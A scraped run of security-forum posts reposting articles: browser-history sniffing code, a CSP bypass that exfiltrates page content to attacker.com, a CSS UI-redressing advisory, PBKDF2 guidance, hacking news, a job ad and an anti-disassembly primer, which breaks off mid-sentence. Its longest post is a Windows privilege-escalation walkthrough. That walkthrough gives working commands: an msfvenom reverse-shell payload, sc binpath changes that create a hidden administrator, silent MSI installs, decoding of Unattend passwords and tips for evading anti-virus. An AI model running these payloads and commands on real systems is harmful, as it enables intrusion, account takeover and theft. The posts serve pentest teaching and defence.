. .'; disclaimer.done_ = true; } var elem = document.getElementById(host); if (!elem) { console.warn('No element found', host); return; } if (t <= TIMING_CONFIRM_THRESHOLD / 2) { console.log('showing', host, t); elem.style.color = ''; } else { console.log('hiding', host, t); elem.style.display = 'none'; notVisitedElem.appendChild(elem); } }, function() { disclaimer.style.color = 'green'; disclaimer.innerText = 'Done!'; saveCrypto_(!notVisitedElem.querySelector('#savecr ypto\\.org')); }); }, 3000); } else { window.setTimeout(function() { saveCrypto_(visitedElem.querySelector('#savecrypto \\.org')); }, 3000); } /** * Tell the user to sign this awesome petition if they haven't visited it! * Thank them if they have! * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {Boolean} signed * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function saveCrypto_(signed) { var text = signed ? 'PS: Thanks for signing <a href="https://savecrypto.org">savecrypto.org</a>! <3' : 'PS: Tell Obama to support strong encryption! Sign the petition at <a href="https://savecrypto.org">savecrypto.org</a>.'; disclaimer.style.display = ''; disclaimer.style.color = 'blue'; disclaimer.innerHTML = text; } // Main loop hosts.forEach(function(host) { calibrateTime(); timeRequest(host); }); Published by CrowdShield on 11/26/2015 Sursa: https://crowdshield.com/blog.php?name=remotely-sniffing-browser-history-via-xss-using-hsts-csp

HITBGSEC 2015 - Dawid Czagan - Hacking Cookies in Modern Web Applications and Browsers PRESENTATION MATERIALS: Index of /materials/sg2015 PRESENTATION ABSTRACT: Since cookies store sensitive data (session ID, CSRF token, etc.) they are interesting from attacker’s point of view. As it turns out, quite many web applications (including sensitive ones like bitcoin platforms) have cookie related vulnerabilities that lead for example to user impersonation, remote cookie tampering, XSS and more. Developers tend to forget that multi-factor authentication will not help when cookies are insecurely processed. Security evaluators underestimate cookie related problems. Moreover, there are problems with secure processing of cookies in modern browsers and browser dependent exploitation can be used to launch more powerful attacks. That’s why secure cookie processing (from the perspective of web application and browser) is a subject worth discussing. The following topics will be presented: – cookie related vulnerabilities in web applications – insecure processing of secure flag in modern browsers – bypassing HttpOnly flag in Safari – problem with Domain attribute in Internet Explorer – cookie tampering in Safari – underestimated XSS via cookie – HTTP Strict Transport Security (HSTS) – importance of regeneration – and more ABOUT DAWID CZAGAN Dawid Czagan (@dawidczagan) has found security vulnerabilities in Google, Yahoo, Mozilla, Microsoft, Twitter, BlackBerry and other companies. Due to the severity of many bugs, he received numerous awards for his findings. Dawid is founder and CEO at Silesia Security Lab, which delivers specialized security auditing and training services. He also works as Security Architect at Future Processing. Dawid shares his security bug hunting experience in his hands-on training “Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more”. He delivered security trainings/workshops at Hack In The Box (Amsterdam), CanSecWest (Vancouver), DeepSec (Vienna), Hack In Paris (Paris) and for many private companies. He also spoke at Security Seminar Series (University of Cambridge) and published over 20 security articles (InfoSec Institute).

(the injected part is "><meta http-equiv="refresh" content='0;url=http://attacker.com/?>) Since browsers can handle only 1 redirection, they have to pick up only 1 among the three. Some browsers use the first one and some use the last one, but never the middle one. That is troublesome because we only care about the middle one. Now think about it: does CSP really cover all the possible ways to fetch resources? Another no. HTTPLeaks is a project that aims to enumerate all possible ways browsers leak requests. They can be something specific to browsers, features that defined by new specifications and whatnot. The most important thing is some of them will not be caught by CSP. In the attack I used prefetch from Resource Hints. Finally We just need to prevent the intended redirection so that our prefetch request will not be dropped. This can be done using javascript: pseudo protocol as browsers refuse to navigate to it in meta refresh. Now everything is set, and the final payload: javascript:"><link rel=prefetch href='//attacker.com/? ...Hooray! Access granted. CSP: 0.5 - Attacker 2.5. Fatality. You can find the original report from HackerOne. Takeaway A proper policy can significantly reduce the chance of XSS Beware of the nonce pitfall Content Exfiltration may be Achilles' Heel of CSP All in all, CSP does not replace input validation Sursa: http://blog.innerht.ml/csp-2015/

November 23, 2015 Abusing CSS Selectors to Perform UI Redressing Attacks Jovon Itwaru Information Security Engineer Introduction Earlier this year, we received an interesting security advisory from Ruben van Vreeland of BitSensorregarding an issue discovered within our publishing platform. The technique Ruben described is unique and exemplifies the creativity needed to produce high-quality research. We analyzed his report and resolved the vulnerability. While we typically do not talk about bugs that we receive, the lesson learned and the uniqueness of this issue is worth sharing. In this blog post, we will describe Ruben’s novel attack that allows attackers to use existing CSS and style attributes to trick members into navigating to an attacker-controlled location, leading to potential social engineering and phishing attacks. Description As part of our publishing platform, we allow members to customize the look and feel and even share rich media content on their blog articles. This involves styling content with CSS, formatting with a subset of HTML elements, and also sharing audio/video resources. To mitigate certain classes of vulnerabilities such as XSS, a limited set of HTML tags (e.g. <img>, <a>, <p> and <br>) and safe attributes are allowed. Let’s dive into a simplified example that illustrates this technique. For instance, to create a blog entry, the following JSON request can be used to generate a new HTML page with an image tag and URL link. json{"content": "<p><a href=\"http://www.linkedin.com\">LinkedIn</a><img src=\"linkedin.png\"/></p>"} Resulting HTML page Rigorous input validation is performed on these elements to ensure attackers cannot introduce attribute or event handlers that would be used to construct XSS attacks. In some scenarios, it is possible to introduce benign attributes such as class that will not be flagged by the input validation filter. While this would not be a vulnerability by itself, Ruben realized that it can be used to reference existing CSS hosted on our site. Considering the extent of the platform, we have many CSS classes that are available on our CDNs and consumed by other products. For example, the following CSS styles are applied to the response page that renders blog entries: css<style> .li_style { position: absolute; width: 100%; z-index: 10021; position: fixed; top: 0; left: 0; width: 100%; height: 100%; padding: 0; overflow-y: scroll; _overflow-y: hidden } </style> This type of style is a common way to force an element to stretch the entire height and width of a page. With knowledge of this available CSS style, we can resubmit the request and reference this style: json{"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"} The li_style covers the entire page. This, in turn, allows the page area to become clickable with a link to Example Domain. Impact and Recommendation As illustrated, an attacker can reuse trusted CSS class selectors to perform UI changes that are invisible to members. We believe that this attack is applicable to many sites, as many allow members to create and share rich media content. This is an interesting technique that uses existing resources to facilitate UI-redressing attacks by chaining together CSS class selectors, and has similarities to Return Oriented Programming (ROP). This technique can be used to send members to sites hosting malware or counterfeit sites that attempt to phish members by requesting their usernames and passwords. This is especially successful on social sites that share blogs or articles. As such, our recommendation is to only accept safe elements and attributes. For example, if theclass attribute is not allowed, reject any request that contains this. Additionally, whitelist filtering should be applied to CSS class selectors to permit necessary styles. We would like to thank Ruben for reporting this issue and help keeping our members safe. Thanks to his excellent work and communication with our team, Ruben was invited to join our private bug bounty program, hosted by HackerOne. This is one of many examples of the collaborations we experience with the talented researchers in our program. If you have a bug you would like considered, please submit to security@linkedin.com. Sursa: https://security.linkedin.com/blog-archive#11232015

Acum, serios vorbind, pseudo-junalistii din ziua de azi sug pula.

"ATENTIE de transmis URGENT Dac? ave?i un apel telefonic ?i pe mobil se afi?eaz? „A C E” nu r?spunde?i; anula?i apelul. Este un virus care distruge cartela SIM ?i distruge mobilul. Aceasta a fost confirmata de Motorola, Sagem si Nokia." WTF is this shit? De la comentarii: https://sternocleidomastoidian.wordpress.com/2010/04/14/informare-a-ministerului-de-interne/

E pe bune, am luat eu root pe laser.

Parameter choice for PBKDF2 PBKDF2, standardised in RFC 2898 and PKCS#5, is a function for creating a cryptographic key from a password. It is the only such function currently appearing in NIST standards, hence it has seen widespread use. The aim of the function is to create a key in such a way that dictionary attacks (where the attacker just tries a range of possible passwords) are unfeasible. To do this, PBKDF2 applies a pseudorandom function (PRF) to the password many times. This means that an attacker making a guess at the password will also have to apply the function many times to his guess. Additionally, the function can be given a “salt” parameter. The idea of this is to make each key derivation operation unique, so that an attacker cannot guess one password and then look for matches against a large number of derived keys. These properties mean PBKDF2 is used not just to produce a key to be used in a cryptographic protocol, but also to store passwords securely (by storing the derived keys). A developer using PBKDF2 must choose parameter values for the salt, the PRF, and the number of iterations, i.e. the number of times the PRF will be applied to the password when deriving the key. The specification suggests (in section 4.1) that the salt be (or contain) a 64 bit pseudorandom value. This makes collisions (i.e. occasions that two stored passwords use the same salt) unlikely. By the birthday paradox, we would expect a collision after 2^32 passwords, i.e. a little more than 4 billion. The PRF mentioned in the specification is SHA-1, and in many libraries this is the only choice. However, using SHA-256 or SHA-512 has the benefit of significantly increasing the memory requirements, which increases the cost for an attacker wishing to attack use hardware-based password crackers based on GPUs or ASICs. The recommended iteration count in the RFC published in September 2000 was 1000. Computing performance has greatly increased since then. Modern guides such as the OWASP password storage cheat sheet (2015) recommend 10 000 iterations.NIST’s own guide (Appendix A.2.2) recommends that the iteration count be “as high as can be tolerated while still allowing acceptable server performance”. Cracking Stuff What are the consequences of a low iteration count? Imagine we are restricted to using SHA-1 as our PRF, as is the case for example in PKCS#11 up to version v2.20. How long would it take a well-resourced attacker (i.e. with access to GPUs) to break an 8-character password? First we have to estimate how much entropy or “randomness” there is in an 8-character password. An excellent paper by Kelley et al. from IEEE Security and Privacy 2012 found that when users are forced to choose a password following the “Comprehensive8” policy, “Password must have at least 8 characters including an uppercase and lowercase letter, a symbol, and a digit. It may not contain a dictionary word.”, the result is roughly 33 bits of entropy. If, however, the password is a perfectly random combination of uppercase and lowercase letters, numbers and the 30 symbols on a US keyboard, we would expect 52 bits of entropy. Interestingly, the same result can be obtained by choosing 4 random words from the Diceware list. Second, we need to know how fast GPUs can calculate PBKDF2. An article from April 2013 reports a rate of 3 million PBKDF2 guesses per second on a typical GPU setup. This includes calculating AES once for each guess (to see if the right key has been derived to decrypt a master key file), and it’s now November 2015, so suppose conservatively we can apply Moore’s law almost once since then (whether one can apply Moore’s “law” to GPUs is doubtful), giving a very rough rule-of-thumb ability of 5 million guesses per second on typical GPU hardware. The table below shows how long an attacker would take to cover the whole password space of a single salted hashed password. [TABLE] [TR] [TH]Password complexity[/TH] [TH]Entropy estimate (bits)[/TH] [TH]1000 iterations[/TH] [TH]10000 iterations[/TH] [/TR] [TR] [TD]Comprehensive8[/TD] [TD]33[/TD] [TD]4 hours 46 minutes[/TD] [TD]47 hours[/TD] [/TR] [TR] [TD]8 random lowercase letters[/TD] [TD]37[/TD] [TD]12 hours[/TD] [TD]5 days[/TD] [/TR] [TR] [TD]8 random letters[/TD] [TD]45[/TD] [TD]123 days[/TD] [TD]3 years 5 months[/TD] [/TR] [TR] [TD]8 letters + numbers + punctuation OR 4 random Diceware words[/TD] [TD]52[/TD] [TD]325 years[/TD] [TD]3250 years[/TD] [/TR] [/TABLE] Conclusions If you have to use PBKDF2, you should: use a unique 64-bit salt for each password. rather than SHA-1, use SHA-512 or if not SHA-256 if you can. use an iteration count of at least 10000, more if you can do it “while still allowing acceptable server performance”. In a future blog post, we’ll cover other password hashing functions like bcrypt, scrypt, and the winner of the recent password hashing competition, ARGON-2. Sursa: https://cryptosense.com/parameter-choice-for-pbkdf2/

Samsung S6 calls open to man-in-the-middle base station snooping Research duo pop baseband chip in preliminary demo-hack 12 Nov 2015 at 05:56, Darren Pauli PacSec Modern Samsung devices including the S6, S6 Edge and Note 4 can have phone calls intercepted using malicious base stations, according to initial research findings from two researchers. Daniel Komaromy and Nico Golde demonstrated the attacks on Samsung's 'Shannon' line of baseband chips today at the Mobile Pwn2Own competition at PacSec, Toyko. Full exploitation details of their research has not been publicly detailed, but it has been disclosed to Samsung. Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phone's baseband processor (the chip that handles voice calls, and which isn't directly accessible to end users). The firmware patch pushes phone calls through the bogus base station, which redirects them to a proxy that records them and passes them on to the intended recipient. Komaromy says the full impact of the attack along with any mitigating factors will be known once seasoned researchers examine their work. "Our example of modifying the baseband to hijack calls is just an example," Komaromy told Vulture South. "The idea with hijacking would be that you can redirect calls to a proxy (like a SIP proxy) and that way you can man-in-the-middle the call. "So that means the caller sees her original call connected - but it can be recorded in the proxy [which is how] it's like a wiretap implant." Nico Golde (l) and Daniel Komaromy at Pwn2Own today. ?????? Drago Ruiu The attack was tested on a new Samsung Galaxy S6 Edge which PacSec organiser Dragos Ruiu took out of its box and updated before handing it over. "I turned it on next to their radio and then dialled myself," Ruiu says of the demonstration held deep below the Tokyo conference to avoid pwning delegate phones. "And instead of ringing on my phone it rang on theirs." The hacker duo now own the phone as a prize and will in March travel to Canada for CanSecWest on a ski trip along with their spouses. They will present further technical detail of the attack at that lauded conference. It comes as Chinese researcher Guang Gong popped the latest version of Google Chrome at the contest. As El Reg reported, the attack likely affects all Android phones and allows the devices to be completely compromised through a single exploit that requires no interaction beyond visiting a crafted web site. Ruiu is offering ski trips and vendors may cough up bug bounties in exchange for the winning hacks. Last year hackers hosed popular phones for shares in $425,000 in cash rewards, but security sponsors Google, Apple, Microsoft and Hewlett Packard's Zero Day Initiative pulled out. ® Sursa: Samsung S6 calls open to man-in-the-middle base station snooping • The Register

[h=1]Senior IT Auditor[/h] What are we looking for? Senior IT Auditor for our Advisory team. Candidate profile: • Conduct IT Audits in accordance with IT audit methodology and other relevant standards; • Strong ability to articulate business risks of deficiencies identified to client personnel; • Identify and communicate findings to client personnel; • Recognize performance improvement opportunities for clients. Requirements: • Bachelor’s degree in an IT related field • Minimum 2 years of experience in IT audits • Ability to identify risks and controls in various IT systems (applications, computer networks, operating systems, databases) • Ability to test the IT controls (entity level, IT general controls, application level) and to identify compensating controls • Basic knowledge of various IT environments • Very good technical and business English • Ability to identify and resolve IT related business issues and provide innovative solutions both for IT and business • Work effectively either individually or as a member of a multi-skilled team • Professional discipline, accuracy, reliability and excellent analytical skills • Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation • Certifications such as CISA, CISSP, CRISC or ISO27001 will be considered a plus Our Offer: • A competitive salary and benefits package • The chance to develop a rewarding professional path and work on challenging assignments • Support for professional qualifications and personal development through a strong mentoring program • Work in a friendly team of security professionals who enjoy sharing their experience with colleagues • The opportunity to participate in a wide variety of technical projects and client environments • Flexible working program We are looking forward to receiving your CV and letter of motivation, in English, until December, 15th 2015. Shortlisted candidates will be invited to interview. Link: http://www.bestjobs.ro/locuri-de-munca-senior-it-auditor/228141/2 Note: 1. Job-ul nu este legat de security 2. Este adresat persoanelor care au mai facut asa ceva Info (cred): https://en.wikipedia.org/wiki/Information_technology_audit Daca aveti nevoie de mai multe informatii imi puteti da PM. Daca vreti sa fie vazut rapid si de catre cine trebuie CV-ul imi puteti da PM.

[h=1]Black Hat USA 2015 - Red Vs Blue Modern Active Directory Attacks, Detection, And Protection[/h]

O sponsoizare de la Starbucks, Gloria Jeans sau mai stiu eu ce, ar prinde bine. L-ar aduce pana si pe @aelius acolo, chiar de ar fi in Germania.

OpenVPN for paranoids Tue 17 November 2015 By Victor Dorneanu Continuing my admin series this time I'd like to setup a VPN using OpenVPN as user-based VPN solution. Unlike IPSec solutions which require IPSec on both (server and client) sides, securing the VPN tunnel by OpenSSL is a more preferable option.In this post I'll try to show which steps have to be taken in order to: secure the communication channel use up-to-date (and secure!) TLS configurations prevent information leaks when the VPN tunnel is down At least for the last one some additional steps are required to route your traffic only through the VPN tunnel. As a client you don't want your connection to be "downgraded" (in terms of security) without even realizing it. That's why you might want to restrict your routes and allow outbound connection only through the (virtual) interface dedicated to the VPN. How this is done and which methods exist, is covered later on. Articol complet: OpenVPN for paranoids - blog.dornea.nu

Posted on November 24, 2015 by Jonathan Common Windows Privilege Escalation Vectors Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!! In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances. Note: In this post, we will focus on escalation techniques that do not rely on kernel exploits such as KiTrap0d (which just so happens to be one of four methods attempted by Meterpreter’s getsystem.) Trusted Service Paths This vulnerability deals with how Windows interprets spaces in a file path for a service binary. Given that these services often run as SYSTEM, there is an opportunity to escalate our privileges if we can exploit this behavior. For example, consider the following file path: C:\Program Files\Some Folder\Service.exe For each space in the above file path, Windows will attempt to look for and execute programs with a name that matches the word in front of space. The operating system will try all possibilities throughout the entire length of the file path until it finds a match. Using the example above, Windows would try to locate and execute programs in the following order: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exeNote: This behavior happens when a developer fails to enclose the file path in quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability. As a result, you may see this vulnerability referred to as “Unquoted Service Paths.” If we were to drop a properly-named malicious executable in an affected folder, upon a restart of the service, we could have our malicious program run as SYSTEM (in a majority of cases). However, prior to dropping an executable, we would have to ensure that we had the necessary privileges to the target folder (organizations with least privilege properly implemented would prevent us from dropping an executable at the root of the drive). Let’s go ahead and step through the process of identifying and exploiting this vulnerability… To start, we can utilize the following one-line Windows Management Instrumentation (WMI) query, written by Danial Compton (@commonexploits), to list all unquoted service paths (minus built-in Windows services) on our compromised machine, GREED: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ As you can see, we have a hit! The path for PFNet’s service binary is unquoted and contains spaces. If the stars align, we will also have the necessary folder permissions. Assuming we’ve already checked our permissions on the root of the drive, let’s use the built-in Windows tool, Integrity Control Access Control Lists (icacls), to view the permissions of the other affected folder in the path, Privacyware icacls "C:\Program Files (x86)\Privacyware" Notice the first line: BUILTIN\Users:(OI)(CI)(M), which lists the permissions for unprivileged users. The (M) stands for Modify, which grants us, as an unprivileged user, the ability to read, write and delete files and subfolders within this directory. WHAT LUCK! We are now free to create and drop a malicious executable called Privatefirewall.exe… let’s begin! Note: We would be able to accomplish the same task if we had Write (W) permissions to the Privacyware folder. For a more information on Windows permissions, check out the following MSDN link: File and Folder Permissions. When creating an executable with MSFVenom, you may wish to have your payload simply add a user to the Local Administrators group (windows/adduser) or send you a reverse Meterpreter shell running as SYSTEM (as demonstrated below). Other options are certainly possible! msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe Now that our malicious executable is in place, let’s try to stop and then restart the PFNet service in order to kick off our shell. To do this, we can utilize the built-in Service Control (sc) tool: sc stop PFNet sc start PFNet LAME! As you can see above, while we have Modify permissions for certain folders within the service path, we don’t actually have permissions to interact with the PFNet service itself. In this scenario, we can wait for someone to restart the GREED machine or force a restart ourselves (stealthy the latter is not). Upon a restart of GREED, Windows locates and executes our Privatefirewall binary, sending us a shell with SYSTEM privileges. The world (or, at least, GREED) is all ours at this point! Metasploit Module: exploit/windows/local/trusted_service_path This module only requires that you link it to an existing Meterpreter session before running: A review of the source code reveals that the module uses some regular expression magic to filter out any paths that are quoted or have no spaces in the path to create a list of vulnerable services. The module then attempts to exploit the first vulnerable service on the list by dropping a malicious service executable into the affected folder. The vulnerable service is then restarted, and afterwards, the module takes care of removing the malicious executable. Note: I didn’t see anywhere in the module’s code that a check is performed as to whether we have appropriate access to the target directory prior to attempting to drop the executable. This seems a little odd to me… Vulnerable Services When discussing exploitation of Vulnerable Services, there are two main ideas that one can be referring to exploiting: Service Binaries Windows Services The former is very similar to what we did with Trusted Service Paths. Whereas Trusted Service Paths exploits odd Windows file path interpretation in combination with folder permissions along the service path, Vulnerable Service Executables takes advantage of file/folder permissions pertaining to the actual executable itself. If the correct permissions are in place, we can simply replace the service executable with a malicious one of our own. Using Privacy Firewall as an example, we’d place an executable named pfsvc.exe into the “Privatefirewall 7.0” folder. VIOLA! The latter refers to the actual Windows Service and the ability to modify it’s properties. These Services run in the background and are controlled by the Operating System through the Service Control Manager (SCM), which issues commands to and receives updates from all Windows Services. If we can modify a Service’s binary path (binpath) property, upon a restart of the service, we can have the Service issue a command as SYSTEM on our behalf. Let’s take a look… The easiest way to determine which Windows Services have vulnerable privileges is to utilize the AccessChk tool, which is part of the SysInternals Suite. This group of tools was written for Microsoft by Mark Russinovich to allow for advanced querying, managing and troubleshooting of systems and applications. While it’s always a good idea to limit the amount of items that you allow to touch disk during a pentesting engagement, due to risk of anti-virus detection (among other concerns), since AccessChk is an official and well-known Microsoft tool, the chances of flagging any protective mechanisms on the machine are slim. Once we have AccessChk downloaded on our target machine, GREED, we can run the following command to determine which Services can be modified by any authenticated user (regardless of privilege level): accesschk.exe -uwcqv "Authenticated Users" * /accepteula Well, what do we have here? PFNet shows it’s face once more! SERVICE_ALL_ACCESSmeans we have full control over modifying the properties of the PFNet Service. In most scenarios an unprivileged account should not have this type of control over a Windows Service, and often times these types of vulnerabilities occur due to misconfiguration by an Administrator or even the third-party developer (believe it or not, Windows XP SP0 actually had several built-in Services with this vulnerability *facepalm*). Note: The PFNet Service was intentionally modified to be insecure for the purposes of this particular demonstration. This explains why we were unable to successfully control the service during the Trusted Service Paths walk-through. Let’s utilize the Service Control (sc) utility to view the configuration properties of the PFNet Service: sc qc PFNet Notice that the BINARY_PATH_NAME value is set to point to pfsvc.exe, which we know is is the associated service binary. Changing this value to a command to add a user and restarting the service will execute this command as SYSTEM (confirmed by validatingSERVICE_START_NAME is set to LocalSystem). We can repeat the process one more time to add our new user to the Local Administrator group: sc config PFNET binpath= "net user rottenadmin P@ssword123! /add" sc stop PFNET sc start PFNET sc config PFNET binpath= "net localgroup Administrators rottenadmin /add" sc stop PFNET sc start PFNET YIKES! The sc utility throws an error each time we start the service with one of our malicious commands in the binpath. This is because the net user and net localgroup commands do not point to the service binary and therefore the SCM cannot communicate with the service. Never fear, however, as the error is thrown only afterissuing our malicious commands: Note: I’d recommend setting the binpath property to point to the original service binary and having the service successfully started/running once you’ve completed your privilege escalation. This will allow normal Service behavior to resume and reduce drawing unwanted attention. Now that we have an established account on GREED with Administrator privileges, it would be rather simple to escalate to SYSTEM in the future if needed (bit o’ Mimikatz, anyone?). Metasploit Module: exploit/windows/local/service_permissions This module only requires that you link it to an existing Meterpreter session before running: This module tries two methods in an attempt to escalate to SYSTEM. First, if the Meterpreter session is currently running under Administrator privileges, the module will aim to create and run a new service. If the current account privileges do not allow for service creation, the module will then seek out to determine if weak folder or file permissions will allow for hijacking existing services. When creating new services or hijacking existing ones, the module creates an executable, which has a randomly-generated filename as well as installation folder path. Enabling the AGGRESSIVE option on this module will exploit every vulnerable service on the target host. With the option disabled, the module stops at the first successful escalation attempt. AlwaysInstallElevated AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. However, granting users this ability is a security concern because For this to occur, there are two registry entries that have to be set to the value of “1” on the machine: [HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001The easiest way to check the values of these two registry entries is to utilize the built-in command line tool, reg query: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated Note: If you happen to get an error message similar to: The system was unable to find the specified registry key or value, it may be that a Group Policy setting for AlwaysInstallElevated was never defined, and therefore an associated registry entry doesn’t exist. Now that we know AlwaysInstallElevated is enabled for both the local machine and the current user, we can proceed to utilize MSFVenom to generate an MSI file that, when executed on the victim machine, will add a user to the Local Administrators group: msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msiOnce you have our newly created MSI file loaded on the victim, we can leverage a command-line tool within Windows, Msiexec, to covertly (in the background) run the installation: msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msiThe properties of the switches utilized in the above Msiexec command are below: /quiet = Suppress any messages to the user during installation /qn = No GUI /i = Regular (vs. administrative) installation Once run, we can check to validate that our account was created and added to the Local Administrator Group: Note: MSI files created with MSFVenom as well as with the always_install_elevated module discussed below, will fail during installation. This behavior is intentional and meant to prevent the installation being registered with the operating system. Metasploit Module: exploit/windows/local/always_install_elevated As you can see below, this module simply requires that you link it to an existing session prior to running: There is an advanced setting, called QUIET, that you’ll want to enable in most scenarios. Turning on QUIET acts the same as utilizing the /quiet switch as part of a Msiexec command. This ensures that all messages to the user are suppressed, keeping our activities covert. The module creates an MSI file with a randomly-generated filename and takes care of all cleanup after deployment. Unattended Installs Unattended Installs allow for the deployment of Windows with little-to-no active involvement from an administrator. This solution is ideal in larger organizations where it would be too labor and time-intensive to perform wide-scale deployments manually. If administrators fail to clean up after this process, an EXtensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts, to include Administrator accounts! While it’s a good idea to search the entire drive, Unattend files are likely to be found within the following folders: C:\Windows\Panther\ C:\Windows\Panther\Unattend\ C:\Windows\System32\ C:\Windows\System32\sysprep\ Note: In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf files on the file system. These files can also contain credential information utilizing during deployment of the operating system, allowing us to escalate privileges. Once you’ve located an Unattend file, open it up and search for the <UserAccounts> tag. This section will define the settings for any local accounts (and sometimes even Domain accounts): <UserAccounts> <LocalAccounts> <LocalAccount> <Password> <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value> <PlainText>false</PlainText> </Password> <Description>Local Administrator</Description> <DisplayName>Administrator</DisplayName> <Group>Administrators</Group> <Name>Administrator</Name> </LocalAccount> </LocalAccounts> </UserAccounts> In the snippet of the sample Unattend file above, you can see a local account being created and added to the Administrators group. The administrator chose not to have the password stored in plaintext; however, it is merely obfuscated with Base64. As seen below, we can trivially decode it in Kali with the following: echo "UEBzc3dvcmQxMjMhUGFzc3dvcmQ=" | base64 -d So, our password is “P@ssword123!Password”? Not quite… Microsoft appends “Password” to all passwords within Unattend files before encoding them; therefore, our Local Administrator password is in fact just “P@ssword123!”. Note: Under the <UserAccounts> section, you may also see<AdministratorPassword> tags, which are another way to configure the Local Administrator account. Metasploit Module: post/windows/gather/enum_unattend This module is relatively straightforward. The only action is to assign it to the active Meterpreter session we are interested in: After a review of the source code, it appears that this module will only search for Unattend.xml files, and therefore, may miss stored credentials in related files such as syspref.xml and syspref.inf. On the positive side, this module will search the entire drive in an attempt to located Unattend files. Group Policy Preferences (GPP) Please refer to my August 2015 blog post for a detailed walkthrough of exploiting GPP for privilege escalation: What You Know Bout GPP???. !!! Important Note Regarding Anti-Virus !!! During my testing, MSI and EXE binaries generated by MSFVenom as well as Metasploit Modules were flagged by some Anti-Virus (a/v) software. This is because the executable templates utilized by Metasploit are well-known to a/v vendors. For more information on why templates are flagged and how to evade detection, please see my September 2015 blog post: A/V Ain’t Got Nothing On Me! Utilizing an obfuscation tool such as Veil-Evasion or creating your own executable by “compiling” PowerShell scripts (to add a user to the Administrators group, for example) stand a much better chance of bypassing any deployed a/v solution. Within Metasploit, modules offer an advanced option to substitute custom EXE and MSI binaries. Just be sure to set EXE::Custom or MSI::Custom to point to your binary prior to executing the module. Additional Resources Windows Privilege Escalation Fundamentals This is an amazing resource put together by Ruben Boonen (@FuzzySec) and was indispensable during my preparation for the Offensive Security Certified Professional exam. Ruben touches on escalation techniques not covered in my post, such as searching the registry for credentials as well as exploiting scheduled tasks. Most definitely worth the read… PowerUp PowerUp is a PowerShell tool written by Will Schroeder (@harmj0y) that will query a victim machine in order to identify what privilege escalation vectors are present. With most of the vectors, if the machine is vulnerable, you can then utilize PowerUp for exploitation. Originally written in 2014 as a standalone tool, it has now been integrated into Empire, a post-exploitation, cryptographically-secure PowerShell agent. Sursa: http://toshellandback.com/2015/11/24/ms-priv-esc/

Anti-Disassembly techniques used by malware (a primer) Rahul Nair | 22 Nov 2015 There are chances that malware authors implement some kind of trolling so that a malware analyst has a hard time figuring out code during static analysis (IDA Pro ?). Implementing these cunning asm instruction will not cause any issues to the flow of the program but will confuse static analysis tools such as IDA Pro from interpreting the code correctly. Once upon a time there were 2 kinds of disassembly algorithms -Linear disassembly and flow-oriented disassembly.The former was used in tutorials/ nobody gives a damn is not used that much in disassemblers. What we are concerned about is the latter which is used in IDA Pro and sometime gamed by malware authors- 1.Jump Instructions to a location with constant value This is the most used trick by malware writers/anti-disassembly programs which create jumps into the same location + 1 or 2 bytes. It would lead to interpretation of completely different byte code by the system. For instance the actual jump instance here would take the flow of program to the bytecode mentioned above. Since tools like IDA pro are not that clever(no offense to the creator) it cannot make such judgements and instead interprets the opcode from E8 instead which shows us a bunch of call instructions to some random crappy address, weird decrements and adds. No we can fix this with ease in IDA PRO. Do that by pressing D on the E8 and C key on the 8B Opcode and voila! you get what is actually being interpreted. After playing around more with the C & D key you get the following in IDA which seems legit Now what has happened here is that the the author might have inserted something known as a rogue byte which confuses IDA pro leading to a wrong interpretation of the rest of the opcode.This is a simple technique and if you dont like to see that ugly E8 byte you could NOP it out 2.Jump Instructions to the Same target IDA Pro usually follows this behavior where for a conditional instruction (jnz) it first disassembles the false branch of the conditional instruction and then moves forward to the true part. From a malware POV since both the jz and jnz are present it is similar to an unconditional jump Once IDA pro reaches the jz instruction it would first branch out and interpret the false instruction and move on to jnz where it would do the same.A nice and dirty trick is to insert a rogue byte code and make the disassembler interpret the instructions as a call. If we do the C & D thingy in IDA pro as mentioned in 1. we get the following code 3.Ping-Pong jumps I have no idea what this technique is named as but it involves doing a lot of jumping around using the method mentioned in 1.and maybe even a bit of 2 Let's look at this innocent jump below. This jumps goes back to loc_4012E6+2 which would be the EB opcode. If we ignore the 66 and B8 opcode ,make IDA interpret the rest as code instead we get the following Yay more jumps. Once again ignoring the other E8 byte and considering the rest as code the result is as follows- We can see how incorporating rogue bytes obscures the real function call from being hidden in static analysis. 4.Usage of Function Pointers Instead of a screen shot here is a piece of code mov [ebp+var8],offset sub4211C1 push 4Ah call [ebp+var_8] What happens above is that a function is called via use of a 